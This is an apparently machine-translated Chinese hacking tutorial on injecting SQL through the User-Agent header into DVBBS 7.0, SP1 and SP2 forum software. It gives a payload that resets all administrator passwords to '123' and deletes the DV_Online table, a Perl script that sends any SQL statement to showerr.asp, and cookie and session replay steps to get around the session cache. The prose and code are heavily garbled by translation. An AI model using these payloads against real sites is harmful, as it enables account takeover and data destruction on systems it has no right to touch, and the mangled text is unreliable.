Since our access program records the corresponding access data in the DV_Online table, as long as this data exists, it will not perform the statement we want to jump to the injectable. Therefore, I have to call the MYBOARDONLINE.OnlineQuery process after waiting for another user access, the timeout user access record (including our access record) can only be deceived again. Otherwise, let us only update our last time to the current value, but there is no impact on other data. The time interval between every two deception is 20 minutes! So if you want to write to the Trojan to the database, you should not wait until your hair is also white. You may say that I am dialing online, just re-dialing? Of course, it can be, even though this is a painful thing for us. In order to solve this tricky problem, we can delete all records in the DV_ONLINE table while modifying the database, which will not be injected continuously. The value of the user-agent after adjustment is: mozilla / 4.0 (compatible; m; m; m; ',' Hacker ', 7,' ', 2) update dv_user set userpassword =' 123 'Where usergroupid = 1 delete from DV_Online -Netscape does not believe you, no matter how much user access record in the database, as long as you can succeed, all the front desk administrator password will be modified, but also remove all user access records. Clean clean. Haha, can we don't want to do it with your heart now?
I think it is under understanding of firstsee. The 20 minutes mentioned in the article didn't delete the time of the Online table, and deleted the online table, and I could not immediately injected (I have tested), I found out the analysis code I found out This 20-minute is the time of session failure, let's see this paragraph in dv_clsmain.asp:
Class Cls_Browser Public Browser, version, platform, IsSearch Private Sub Class_Initialize () Dim Agent, Tmpstr IsSearch = False If Not IsEmpty (Session ( "Cls_Browser")) Then Tmpstr = Split (Session ( "Cls_Browser"), "|||" ) Browser = tmpstr (0) Version = tmpstr (1) Platform = tmpstr (2) ife tmpstr (3) = "1" THEN ISSEARCH = TRUE END IF EXIT SUB END IF
Because the first injected Browser data is saved in Session ("CLS_Browser", we have implemented the initial INTO [DV_OONLINE], the execution is still the first injected statement, only the SESSION ("CLS_Browser" ) Failure, our second injection statement can take effect, some people will say, we directly use the program to send bags, ignore the cookie, don't create a new session, you can do it directly to implement Insert Into [DV_OLINE] Inject, but please see the code inside the sub activeonline ():
SP2:
If Datediff ("S", ReflashPageLastTime, NOW ()) <120 and lastvisiboardid = BoardID and not instr (scriptname, "showerr")> 0 THEN EXIT SUB7.0 and SP1:
If Datediff ("S", ReflashPageLastTime, Now ()) <120 and lastvisiboardid = BoardId THEN EXIT SUB
After I test, I first requested a page, such as request list.asp? BoardId = 1, get LastvisiboardId = 1, BoardId = 1, Datediff ("s", reflashpagelasttime, now ()) = 0, For SP2, we only want to execute, we only ask Showerr.asp, look at the showerr.asp code, discover:
Select Case Action Case "Otherer" Dvbbs.stats = Action & "-" & Template.strings (0) dvbbs.head () dvbbs.showtoptable () DVBBS.HEAD_VAR 0, "", Template.Strings (0), "" Template. HTML (0) = Replace (Template.html (0), "{$ Color}", DVBBS.MAINSETTING (1)) Template.html (0) = Replace (Template.html (0), "{$ Errtitle}" , Dvbbs.forum_info (0) & "-" & DVBBS.Stats) Template.html (0) = Replace (Template.html (0), "{$ Action}", "Access Forum") Template.html (0) = Replace (Template.html (0), "{$ Errcount}", 1) Template.html (0) = Replace (Template.html (0), "{$ Errstring}", Request ("Errcodes")) if Request ("Autoreload") = 1 Then response.write " "End if Response.write template.html (0) if Dvbbs.Userid = 0 Then Response.write template.html (1) end if Dvbbs.activeOnline () DVBBS.FOOTER ()
When he called an ActiveOnline () subroutine, he called, let's request showerr.asp? BoardId = 0 & an = Otherer page with the program to send bags, and the cookie is set to empty, let him establish a new session every time you request. But don't forget to add a statement in User_Agent, :) It's better to go here, this is simple, I wrote a small program to submit. The original code is as follows:
-------------------------------------------------- ----------------
#! / usr / bin / perl # us ie :: socket; $ | = 1; use socket; $ argc = @argv; print "/ t * the script for DVBS7 SP2 SQL version USER_AGENT Injection * / n"; print " / t * code by xiaolu QQ: 50446 * / n "; if ($ argc <4) {print" / n usage: / sev.exe domain name BBS path SQL statement port / sev.exe 666w.com / bbs / / " Update [dv_user] set username = 'feng' / "80 / n"; exit;} $ host = @argv [0]; $ way = @argv [1]; $ way1 = @argv [2]; $ port = @Argv [3]; # $ war1 = ~ s / / / / / / g; print "/ n / N Start testing on $ host, please wait ... / n"; $ req = "Get $ WAY "" showerr.asp? BoardId = 0 & action = ocherer http / 1.0 / n "." Accept: * / * / n "." ACCEERER: $ Host / N "." Accept-language: zh-cn / n ". "User-agent: Opera / 100.0 ',' Main Forum ', 1,' 1 ', 0); $ WAY1 Delete from [DV_OnLine]; - (Compatible; Msie 4.0; Windows NT 5.0; Hotbar 4.4.6.0) / n "." Host: $ host: $ port / n "." cookie: / n / n "; Print $ Req; @res = sendraw ($ REQ); print" / n / @res / n "; SUB Sendraw {MY ($ REQ) = @_; my $ target; $ target = inet_aton ($ host) || DIE ("inet_aton problems / n"); socket (s, pf_inet, sock_stream, getprotobyname ('tcp') || 0) || DIE ("Socket Problems / N"); IF (Connect (S, PA CK "sna4x8", 2, $ port, $ target)) {SELECT (S); $ | = 1; Print $ Req; my @res = ; select); close (s); return @res } Else {DIE ("can't connect ... / n");}} ----------------------------- -----------------------------------
It is not that simple for SP1 and 7.0, but we still have a way, or the same use program request page cannot use the browser ("CLS_BROWSER", saved browser information), remember, first Time must write User_Agent's injection, let him have session ("cls_browser") for the first time, so that we will perform him for the second time, cookie is written or empty, request list.asp? BoardID = 1 (This page wants to exist) submit the captain, or record the results to the file, easy us to look at the cookie, I have seen the bag intercepted two lines set-cookie (or more), such as: SET-Cookie: 10 % 2E0% 2E0% 2E8% 2FDV% 2F = statuserid = 2321989; Expires = SAT, 12-JUN-2004 23:25:18 gmt; Path = / DV /
Set-cookie: aspsessionidsqtsdabr = DKNDJAIBBLGCONMFJMFHGGG; PATH = /
In order to let STATUSERID do not exist in the Online database (if present, the update is executed without performing the injecting statement), and we also want to inherit the session, when submitted, you can make Datediff ("s", reflashpagelasttime, now )) <120 and lastvisiboardidiD = BoardID
Do not set up, perform our injection statement, then use this cookie:
Cookie: aspsessionidsqtsdabr = DKNDJAIBBLGCONMFJMFHGGG; PATH = /
Use the program to request the page for the second time, so inherit the session, user_agent now does not work (stored in session), what page requests? As long as the BoardId is not 1 version, such as list.asp? BoardId = 2 (this layout wants to exist) or index.asp, etc., the useerActiveOnline process is executed, because the STATUSERID is empty, he will execute us the existence of SESSION In the injection statement, if you want to perform the next one, create a new session from the head, then capture the package, and the same top, huh, huh.
Write a small program, write the submission result in file abc.txt, and look at the cookie.
-------------------------------------------------- -------------------------
